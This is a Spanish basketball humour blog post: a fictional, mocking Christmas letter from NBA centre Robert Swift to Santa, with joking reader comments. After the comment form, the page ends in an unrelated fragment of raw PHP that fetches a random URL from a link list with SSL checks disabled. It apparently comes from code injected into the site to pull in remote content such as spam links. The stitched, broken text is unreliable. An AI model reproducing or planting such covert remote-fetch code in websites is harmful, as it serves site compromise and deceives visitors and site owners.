Pasatiempos: El deseo de Robert Swift

01 de January de 2009 por txusma

Tras una intensa labor de investigación el equipo de TJNBA ha podido tener acceso a la carta que Robert Swift, pívot de los Thunder, le escribió a Papá Noel el pasado 24 de Diciembre. Desconocemos si se la envió por correo o por el contrario se la dio en persona mientras se la leía sentado en sus rodillas:

“Querido Papa Noel,

Este año me he portado muy bien y he sido un jugador de baloncesto bueno. Buena persona, quiero decir. No me he peleado con mis compañeros, he jugado mucho a la Play con mi primo Stromile que tiene tanto tiempo libre como yo y he hecho caso a mi mamá en todo lo que me ha dicho (menos en cualquier cosa referente a mi aspecto). Además llevamos más de 2 meses de competición y no me he lesionado apenas, tan solo me he perdido 14 partidos de nada. Minucias.

Por eso quería pedirte un solo deseo por Navidad. Me gustaría jugar unos minutitos contra los Phoenix Suns para poder enfrentarme a mi ídolo de juventud, Shaquille O’Neal. De pequeño ya me decían que me parecía mucho a él aunque creo que ahora la semejanza se ha acentuado aún más. Incluso hay quien dice que parecemos hermanos y que nos movemos igual en la pista, aunque Kevin se rie de mi y dice que será porque ahora mi piel es mucho más negra que antes. Bueno, que me hace mucha ilusión jugar contra Shaq porque Jordan, al que también admiro mucho, ya se ha retirado y no va a volver, aunque en el vestuario se comenta que si los Bobcats pierden 10 partidos más a lo mejor se vuelve a vestir de corto.

Ahora que lo pienso mejor además de emparejarme con Shaquille también me gustaría hacerlo con Amare y ya que estamos me gustaría poder machacar en su cara. Si, si… en su cara y también en la de Shaquille, claro. Que se enteren que se aproxima un cambio de ciclo en cuanto a pívots se refiere. ¡Oh, oh! Y quiero que cuando machaque, los 2 me miren con cara de admiración, mientras el resto del quinteto de los Suns (donde no ha de faltar Grant Hill, aunque sí Nash, que me cae un poco mal) se queda totalmente embelesado ante mi agilidad, fuerza y destreza. Todo mientras el pabellón queda en silencio para dar paso 3 segundos después a una ovación atronadora digna del pívot que está por venir.

Y para acabar, y si no es mucho pedir me gustaría que me hicieran una foto del momento para poder colgarla en mi habitación aprovechando el regalo del amigo invisible que me ha hecho Russell: un marco de fotos hecho con cartón y pintado de colores. ¡Y la última cosa! En la foto que no salga Durant, que siempre se lleva todos los flashes, ni Jeff Green, que la gente le hace más caso que a mí. Y claro, tampoco Westbrook ni Wilcox ni Collison ni Petro ni Watson ni Sene ni Mason ni Joe Smith ni Damien Wilkins. Y tampoco el tal Crisis que parece ser que hemos fichado ahora para agitar la toalla (estando yo, no pretenderá jugar,de pívot, ¿verdad?).

Creo que no es mucho lo que pido y me he portado tan bien que seguro me concederás el deseo. Por otra parte si no lo haces, a lo mejor voy con mi máquina tatuadora al polo norte y te dejo hecho un cromo. Como tu prefieras.

Siempre tuyo,

Robert “Big Red Head” Swift “

En este caso Papá Noel no trajo un regalo. ¡Hizo un milagro ! (Lástima de la cara de susto de Robert. No se lo debía creer).

Comenta

9 comentarios a esta entrada

  1. telekoman dice:
    #1

    Jajajajajajajajajajajajaja

      Citar

  2. Hynreck dice:
    #2

    Muy bueno Txus, feliz año!!

      Citar

  3. David dice:
    #3

    jajajaja qué grande!

    Feliz año a todos, que he estado unos días desconectado 😀

      Citar

  4. MagicJohnson32 dice:
    #4

    Jojojo, qué grande Robert “Chamberlain” Swift. Por cierto, diría que es el único jugador en todo el mundo al que le hemos dedicado dos posts… Es para hacérnoslo mirar, eh.

      Citar

  5. David Parra dice:
    #5

    Jajajaja, muy bueno! 😀

      Citar

  6. Txusma dice:
    #6

    Precisamente iba a proponer adoptarlo… Con la llegada de Krstic a lo mejor no juega mucho más y eso sería una lástima.

      Citar

  7. Fernando dice:
    #7

    Jajaja es realmente buena la carta. Muy original. Felicidades

      Citar

  8. Dantley dice:
    #8

    jo, jo, que buenísimo ¡¡¡

    Le están haciendo pasillo, no??

      Citar

  9. TheDeerHunter dice:
    #9

    … y la ola

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>